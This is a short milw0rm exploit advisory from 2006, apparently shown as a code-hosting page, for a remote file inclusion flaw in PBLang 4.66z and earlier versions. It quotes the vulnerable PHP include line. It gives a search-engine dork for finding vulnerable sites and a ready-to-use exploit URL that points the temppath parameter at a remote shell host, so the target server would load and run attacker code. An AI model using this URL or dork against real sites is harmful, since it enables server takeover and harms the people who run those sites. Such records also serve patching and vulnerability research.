38 lines
No EOL
1.4 KiB
Text
38 lines
No EOL
1.4 KiB
Text
#==============================================================================================
|
|
#Software PBLang <= v4.66z (temppath) Remote File Inclusion Exploit
|
|
#===============================================================================================
|
|
#
|
|
#Critical Level : Dangerous
|
|
#
|
|
#Venedor site : http://sourceforge.net/projects/pblang/
|
|
#
|
|
#Version : 4.66z & All Versions Bellow
|
|
#
|
|
#================================================================================================
|
|
#
|
|
#Dork : "Software PBLang 4.66z" & "Software PBLang 4.60" or "Software PBLang"
|
|
#
|
|
#================================================================================================
|
|
#Bug in : templates/pb/language/lang_nl.php
|
|
#
|
|
#Vlu Code :
|
|
#--------------------------------
|
|
#
|
|
# include($temppath.'/pb/language/lang_en.php');
|
|
#
|
|
#================================================================================================
|
|
#
|
|
#Exploit :
|
|
#--------------------------------
|
|
#
|
|
#http://sitename.com/[Script Path]/templates/pb/language/lang_nl.php?temppath=http://SHELLURL.COM
|
|
#
|
|
#================================================================================================
|
|
#Discoverd By : SHiKaA
|
|
#
|
|
#Conatact : SHiKaA-[at]hotmail.com
|
|
#
|
|
#Special Thx To : Str0ke & HACKERS PAL & XoRoN & Simoo & Saudi HAckerz
|
|
==================================================================================================
|
|
|
|
# milw0rm.com [2006-09-25] |